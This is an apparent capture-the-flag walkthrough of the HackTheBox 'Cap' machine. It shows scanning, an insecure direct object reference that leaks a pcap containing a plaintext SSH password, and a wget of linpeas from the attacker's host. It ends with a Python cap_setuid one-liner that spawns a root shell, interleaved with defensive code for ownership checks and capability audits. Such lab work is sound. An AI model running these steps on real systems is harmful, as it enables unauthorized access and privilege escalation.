Cap

A relatively easy Linux box on HackTheBox; you can root it in less than an hour.

nmap

(base) [psdon@arch cap]$ mkdir nmap  
(base) [psdon@arch cap]$ sudo rustscan -a 10.10.10.245 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan 

A web server is running on port 80.

Web Enumeration

There's an interesting section in the sidebar located at /capture; when you go to that URL, you are redirected to /data/<int>.

Every time I visited /capture, the integer in the /data/1 URL incremented by 1.

So I changed it to /data/0 and got a pcap file; I analyzed it in Wireshark and found credentials in it.
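As an added example (my code, not the box's application or anything from the write-up), this is the shape of the bug behind /data/<int> next to the object-level authorization check that closes it; the store, the owner names and the pcap bytes are constructed.

```python
from dataclasses import dataclass
import secrets


@dataclass
class Capture:
    capture_id: str
    owner: str      # account that triggered the capture
    pcap: bytes     # file bytes served by /data/<id>


# Constructed store: capture 0 belongs to another account, capture 1 to nathan.
# The bytes are just a pcap magic header plus a label; they stand in for real files.
STORE = {
    "0": Capture("0", "someone_else", b"\xd4\xc3\xb2\xa1[constructed pcap 0]"),
    "1": Capture("1", "nathan", b"\xd4\xc3\xb2\xa1[constructed pcap 1]"),
}


def download_vulnerable(store, requester, capture_id):
    """Behaves like /data/<int> on the box: the file is looked up by id only, so a
    logged-in user can read any capture just by changing the integer."""
    cap = store.get(str(capture_id))
    return cap.pcap if cap else None


def download_fixed(store, requester, capture_id):
    """Object-level authorization: the record must exist AND belong to the requester.
    Missing and not-owned both return None so the response does not reveal
    whether an id exists."""
    cap = store.get(str(capture_id))
    if cap is None or cap.owner != requester:
        return None
    return cap.pcap


def new_capture_id():
    """Unguessable ids stop the sequential-integer enumeration, but they complement
    the ownership check above rather than replace it."""
    return secrets.token_urlsafe(16)
```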

Initial Shell

I logged in over SSH using those credentials, and it looks like we got an initial shell. Sweet :D

(base) [psdon@arch cap]$ ssh nathan@10.10.10.245                                                         
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.                             
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.                           
This key is not known by any other names                                                                 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                 
Warning: Permanently added '10.10.10.245' (ED25519) to the list of known hosts.                          
nathan@10.10.10.245's password: Buck3tH4TF0RM3!                                                                         
nathan@cap:~$

Post Exploitation

First, let's transfer linpeas.sh from our machine to the target machine.

(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/                                                  
(base) [psdon@arch linPEAS]$ ls                                                                           
builder  images  linpeas.sh  README.md                                                                    
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80                                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 

You can find the machine IP address by executing the following.

(base) [psdon@arch ~]$ ip a | grep tun0
9: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    inet 10.10.14.15/23 scope global tun0

Then transfer the script using wget.

nathan@cap:~$ wget http://10.10.14.15/linpeas.sh                                                         
--2021-08-29 19:09:04--  http://10.10.14.15/linpeas.sh                                                   
Connecting to 10.10.14.15:80... connected.

nathan@cap:~$ chmod +x linpeas.sh 

Then run linpeas.sh.

nathan@cap:~$ ./linpeas.sh                                                                                                                                                                                         

I noticed that the python3.8 binary had a capability set on it.

Privilege Escalation

We can gain root by executing the following command:

nathan@cap:/var/www/html$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'                                                                                                                 
root@cap:/var/www/html#  
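As an added check (my code, not from the write-up or from linpeas), this parses `getcap -r /` output in both libcap formats and flags file capabilities that give root-equivalent power, especially on interpreters like the python3.8 binary here; the sample lines are constructed and assume cap_setuid is the capability that lets os.setuid(0) succeed above.

```python
import re
import shutil
import subprocess

# Capabilities that let an unprivileged user become root or read any file.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_setfcap"}
# Interpreters: any capability on these amounts to arbitrary code with that capability.
INTERPRETERS = re.compile(r"/(python[0-9.]*|perl[0-9.]*|ruby|node|php)$")

def parse_getcap_line(line):
    """Parse one `getcap -r /` line in either libcap format:
       '/usr/bin/ping = cap_net_raw+ep'  (libcap before 2.41)
       '/usr/bin/ping cap_net_raw=ep'    (libcap 2.41 and later)
    Returns (path, set of capability names), or None for non-matching lines."""
    m = re.match(r"^(/\S*)\s+(?:=\s+)?(.+)$", line.strip())
    if not m:
        return None
    path, spec = m.groups()
    caps = set()
    for clause in spec.split():              # e.g. 'cap_chown,cap_setuid+ep'
        names = re.split(r"[+=-]", clause, maxsplit=1)[0]
        caps.update(names.split(",") if names else ["all"])  # bare '=ep' means all
    return path, caps

def audit(lines):
    """Return (path, sorted capability names) for binaries that warrant review."""
    findings = []
    for parsed in map(parse_getcap_line, lines):
        if parsed is None:
            continue
        path, caps = parsed
        bad = (caps & DANGEROUS) | ({"all"} & caps)
        if bad or (INTERPRETERS.search(path) and caps):
            findings.append((path, sorted(bad or caps)))
    return findings

def audit_host():
    """Run getcap on this host; returns [] where getcap is not installed.
    A finding such as python3.8 is removed with `setcap -r /usr/bin/python3.8`."""
    if shutil.which("getcap") is None:
        return []
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    return audit(out.splitlines())

# Constructed sample: cap_setuid on python3.8 is what lets os.setuid(0) succeed.
SAMPLE = ["/usr/bin/ping = cap_net_raw+ep",
          "/usr/bin/python3.8 = cap_setuid+ep",
          "/usr/bin/mtr-packet cap_net_raw=ep"]
```

Run `audit_host()` as root on a box you administer to get the same list linpeas prints, minus the noise; only the constructed sample is exercised by the assertions.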
